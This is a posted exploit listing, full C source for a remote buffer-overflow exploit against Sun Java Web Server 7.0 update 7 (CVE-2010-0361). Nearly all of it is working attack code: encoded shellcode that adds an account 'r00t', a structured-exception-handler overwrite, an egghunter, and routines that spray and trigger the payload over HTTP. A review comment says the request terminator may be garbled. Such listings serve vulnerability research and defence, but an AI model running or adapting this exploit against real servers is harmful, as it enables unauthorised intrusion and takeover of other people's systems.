
Sun Java Web Server 7.0 u7 Remote Exploit (CVE-2010-0361)

Posted on 03 July 2010

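/* Sun Java Web Server Exploit
 * Tested on:
 *   Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This vulnerability was identified by Evgeny Legerov
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Date: 23/01/2010
 *
 * How it works (from the request layouts below): four GET requests carry an
 * egg-tagged copy of the shellcode so copies sit in server memory, then one
 * OPTIONS request on a very long path under DIRECTORY overwrites the SEH
 * record (next-SEH = short jmp, handler = 0x12017bee).  The jmp lands on a
 * NOP sled followed by a 32-byte int 2e egghunter that scans memory for the
 * w00tw00t tag and jumps to the shellcode behind it.
 *
 * WARNING: the payload creates a local account r00t / r00tr00t123 on the
 * target.  Run only against systems you are authorised to test, and remove
 * the account afterwards.
 */
#ifdef _MSC_VER
#include "stdafx.h"                 /* precompiled-header stub of the original MSVC project */
#pragma comment(lib, "ws2_32")
#endif
#ifdef _WIN32
#include <winsock2.h>
#else
/* Minimal POSIX shim so the same source builds on a non-Windows attacker box. */
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
typedef int SOCKET;
#define INVALID_SOCKET (-1)
#define SOCKET_ERROR   (-1)
#define closesocket(s) close(s)
#endif
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum {
    PADDING_LEN = 129,   /* 'A's between the directory and the egg */
    NOP_COUNT   = 10,    /* encoded NOPs between the SEH handler and the egghunter */
    SPRAY_COUNT = 4      /* GET requests used to seed memory with shellcode */
};

static const char banner[]  = "SJWSex vs Sun Java Web Server 7.0 u7 (C) dmc <dmc@deadbeef.co.uk> ";
static const char verb[]    = "GET /";
static const char options[] = "OPTIONS /";
static const char version[] = " HTTP/1.0";

/* NOTE(review): the listing this was recovered from shows a single space as
 * the request terminator, copied with lengths 2 and 3; the original almost
 * certainly carried newline bytes that the page extraction collapsed.  Copying
 * 3 bytes from a 2-byte literal read past it, so both copies are now bounded
 * by sizeof (which includes the NUL).  Confirm the terminator bytes against
 * the original source before relying on this. */
static const char request_end[] = " ";

/* Encoding the payloads in URL hex prevents them getting converted to unicode
 * (original author's note).  Each "%XX" decodes to one byte on the server. */
static const char seh[]     = "%ee%7b%01%12";   /* 0x12017bee, the SEH handler address */
static const char nextseh[] = "%eb%10%90%90";   /* EB 10 = jmp short +0x10: measured from
                                                 * the end of the jmp this skips the two
                                                 * trailing NOPs, the 4-byte handler and the
                                                 * ten NOPs and lands on the egghunter */
static const char nop[]     = "%90";
/* int 2e egghunter; B8 77 30 30 74 is the "w00t" tag it compares twice (scasd) */
static const char egghunter[] =
    "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
static const char egg[]     = "%77%30%30%74%77%30%30%74"; /* w00tw00t */

/* adduser r00t / r00tr00t123 */
static const char shellcode[] =
    "%89%e6%db%cd%d9%76%f4%58%50%59%49%49%49%49%43"
    "%43%43%43%43%43%51%5a%56%54%58%33%30%56%58%34"
    "%41%50%30%41%33%48%48%30%41%30%30%41%42%41%41"
    "%42%54%41%41%51%32%41%42%32%42%42%30%42%42%58"
    "%50%38%41%43%4a%4a%49%4b%4c%4d%38%4b%39%45%50"
    "%45%50%43%30%43%50%4d%59%4b%55%46%51%48%52%42"
    "%44%4c%4b%46%32%50%30%4c%4b%46%32%44%4c%4c%4b"
    "%51%42%44%54%4c%4b%42%52%46%48%44%4f%4f%47%51"
    "%5a%47%56%46%51%4b%4f%50%31%49%50%4e%4c%47%4c"
    "%43%51%43%4c%45%52%46%4c%47%50%49%51%48%4f%44"
    "%4d%43%31%48%47%4d%32%4c%30%46%32%46%37%4c%4b"
    "%50%52%44%50%4c%4b%47%32%47%4c%45%51%48%50%4c"
    "%4b%51%50%43%48%4d%55%49%50%44%34%51%5a%45%51"
    "%48%50%50%50%4c%4b%47%38%44%58%4c%4b%50%58%51"
    "%30%45%51%4e%33%4a%43%47%4c%51%59%4c%4b%47%44"
    "%4c%4b%45%51%4e%36%46%51%4b%4f%46%51%49%50%4e"
    "%4c%49%51%48%4f%44%4d%43%31%48%47%50%38%4b%50"
    "%43%45%4a%54%43%33%43%4d%4b%48%47%4b%43%4d%47"
    "%54%43%45%4a%42%46%38%4c%4b%50%58%46%44%45%51"
    "%48%53%42%46%4c%4b%44%4c%50%4b%4c%4b%50%58%45"
    "%4c%43%31%49%43%4c%4b%44%44%4c%4b%45%51%4e%30"
    "%4d%59%50%44%47%54%46%44%51%4b%51%4b%45%31%50"
    "%59%50%5a%46%31%4b%4f%4b%50%46%38%51%4f%50%5a"
    "%4c%4b%42%32%4a%4b%4b%36%51%4d%43%5a%43%31%4c"
    "%4d%4b%35%4e%59%45%50%43%30%43%30%46%30%43%58"
    "%46%51%4c%4b%42%4f%4d%57%4b%4f%48%55%4f%4b%4b"
    "%50%45%4d%46%4a%45%5a%45%38%49%36%4a%35%4f%4d"
    "%4d%4d%4b%4f%48%55%47%4c%45%56%43%4c%44%4a%4d"
    "%50%4b%4b%4d%30%42%55%44%45%4f%4b%50%47%42%33"
    "%42%52%42%4f%42%4a%43%30%46%33%4b%4f%4e%35%45"
    "%33%42%4d%45%34%46%4e%43%55%44%38%45%35%51%30"
    "%46%4f%43%53%47%50%42%4e%45%35%42%54%51%30%43"
    "%45%42%53%45%35%43%42%51%30%44%32%50%30%46%50"
    "%42%54%51%30%43%42%46%50%46%50%42%54%44%32%50"
    "%30%46%50%43%44%46%51%46%52%46%53%47%50%46%4f"
    "%51%51%50%44%51%54%47%50%51%36%46%46%51%30%42"
    "%4e%43%55%44%34%51%30%42%4c%42%4f%45%33%45%31"
    "%42%4c%43%57%43%42%42%4f%44%35%42%50%47%50%51"
    "%51%42%44%42%4d%45%39%42%4e%43%59%42%53%44%34"
    "%44%32%45%31%43%44%42%4f%43%42%42%53%51%30%42"
    "%52%46%50%46%50%42%54%51%30%46%4f%47%31%50%44"
    "%51%54%45%50%45%5a%41%41";

/* Print the banner and command-line synopsis to stderr. */
static void usage(void)
{
    fprintf(stderr, "%s", banner);
    fprintf(stderr, "%s", "Example: sjwsex.exe [ip] [port] [directory] ");
}

/* Copy n bytes of src to dst and return the advanced write pointer. */
static char *append(char *dst, const char *src, size_t n)
{
    memcpy(dst, src, n);
    return dst + n;
}

/* Parse a decimal TCP port.  Returns the port, or -1 if s is not an integer
 * in 1..65535 (the original atoi() silently accepted anything). */
static long parse_port(const char *s)
{
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < 1 || v > 65535)
        return -1;
    return v;
}

/* [ GET / | EGG | SHELLCODE | HTTPVERSION | terminator ]
 * The request sent SPRAY_COUNT times to seed server memory with tagged
 * shellcode.  Returns a NUL-terminated heap string the caller frees, or
 * NULL on allocation failure. */
static char *build_spray_request(void)
{
    size_t len = strlen(verb) + strlen(egg) + strlen(shellcode) + strlen(version);
    char *buf = malloc(len + sizeof request_end);
    if (buf == NULL)
        return NULL;
    char *p = buf;
    p = append(p, verb, strlen(verb));
    p = append(p, egg, strlen(egg));
    p = append(p, shellcode, strlen(shellcode));
    p = append(p, version, strlen(version));
    append(p, request_end, sizeof request_end);   /* sizeof includes the NUL */
    return buf;
}

/* [ OPTIONS / | DIRECTORY | / | PADDING | EGG | SHELLCODE | NEXTSEH | SEH | NOPS | EGGHUNTER | HTTPVERSION | terminator ]
 * The single OPTIONS request whose over-long path overwrites the SEH record.
 * Returns a NUL-terminated heap string the caller frees, or NULL on
 * allocation failure. */
static char *build_trigger_request(const char *directory)
{
    size_t len = strlen(options) + strlen(directory) + 1 + PADDING_LEN
               + strlen(egg) + strlen(shellcode) + strlen(nextseh) + strlen(seh)
               + NOP_COUNT * strlen(nop) + strlen(egghunter) + strlen(version);
    char *buf = malloc(len + sizeof request_end);
    if (buf == NULL)
        return NULL;
    char *p = buf;
    p = append(p, options, strlen(options));
    p = append(p, directory, strlen(directory));
    p = append(p, "/", 1);
    memset(p, 'A', PADDING_LEN);
    p += PADDING_LEN;
    p = append(p, egg, strlen(egg));
    p = append(p, shellcode, strlen(shellcode));
    p = append(p, nextseh, strlen(nextseh));
    p = append(p, seh, strlen(seh));
    for (int i = 0; i < NOP_COUNT; i++)
        p = append(p, nop, strlen(nop));
    p = append(p, egghunter, strlen(egghunter));
    p = append(p, version, strlen(version));
    append(p, request_end, sizeof request_end);   /* sizeof includes the NUL */
    return buf;
}

/* Connect to ipaddr:port (ipaddr in host byte order), wait up to 3 seconds
 * for the socket to become writable, send the whole NUL-terminated buffer
 * (looping over short sends) and close.  Returns 0 on success, -1 on any
 * failure; the socket is closed on every path, which the original did not
 * do when the writability wait timed out. */
static int send_buffer(int ipaddr, int port, const char *buffer)
{
    struct sockaddr_in server;
    struct timeval timeout;
    fd_set mask;
    size_t left = strlen(buffer);
    int rc = -1;

    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        fprintf(stderr, "%s ", "[*] socket error");
        return -1;
    }

    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl((uint32_t)ipaddr);
    server.sin_port = htons((unsigned short)port);

    /* The original ignored the connect result and relied on select() alone. */
    if (connect(s, (struct sockaddr *)&server, sizeof server) == SOCKET_ERROR) {
        fprintf(stderr, "%s ", "[*] connect error");
        goto out;
    }

    timeout.tv_sec = 3;
    timeout.tv_usec = 0;
    FD_ZERO(&mask);
    FD_SET(s, &mask);
    if (select((int)s + 1, NULL, &mask, NULL, &timeout) <= 0 || !FD_ISSET(s, &mask)) {
        fprintf(stderr, "%s ", "[*] socket not writable");
        goto out;
    }

    while (left > 0) {
        long n = (long)send(s, buffer, (int)left, 0);
        if (n < 0) {
            fprintf(stderr, "%s ", "[*] error sending buffer ");
            goto out;
        }
        buffer += n;
        left -= (size_t)n;
    }
    rc = 0;

out:
    closesocket(s);
    return rc;
}

/* sjwsex [ip] [port] [directory]: spray the shellcode with SPRAY_COUNT GET
 * requests, then send the SEH-overwriting OPTIONS request.  Exit status is 0
 * on success (or when printing usage) and 1 on any failure. */
int main(int argc, char *argv[])
{
    char *spray = NULL, *trigger = NULL;
    int rc = 1;

    if (argc < 4) {
        usage();
        return 0;
    }

    unsigned long addr = inet_addr(argv[1]);
    if (addr == INADDR_NONE) {
        fprintf(stderr, "%s ", "[*] invalid ip address");
        return 1;
    }
    int ipaddr = (int)ntohl(addr);            /* send_buffer takes host byte order */
    long port = parse_port(argv[2]);
    if (port < 0) {
        fprintf(stderr, "%s ", "[*] invalid port");
        return 1;
    }
    const char *directory = argv[3];

    fprintf(stderr, "%s", banner);

#ifdef _WIN32
    WSADATA info;
    if (WSAStartup(MAKEWORD(2, 0), &info)) {
        fprintf(stderr, "%s ", "Unable to start WSA");
        return 1;
    }
#endif

    spray = build_spray_request();
    trigger = build_trigger_request(directory);
    if (spray == NULL || trigger == NULL) {
        fprintf(stderr, "%s ", "[*] out of memory");
        goto out;
    }

    /* build payload and place shellcode in memory */
    fprintf(stderr, "%s ", "[*] Filling memory with shellcode");
    for (int i = 0; i < SPRAY_COUNT; i++) {
        if (send_buffer(ipaddr, (int)port, spray) != 0)
            goto out;
    }

    /* final buffer: overwrite SEH */
    fprintf(stderr, "%s ", "[*] Sending final buffer");
    if (send_buffer(ipaddr, (int)port, trigger) != 0)
        goto out;

    fprintf(stderr, "%s ", "[*] Wait 2 minutes and connect with r00t / r00tr00t123");
    rc = 0;

out:
    free(trigger);
    free(spray);
#ifdef _WIN32
    WSACleanup();
#endif
    return rc;
}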

 
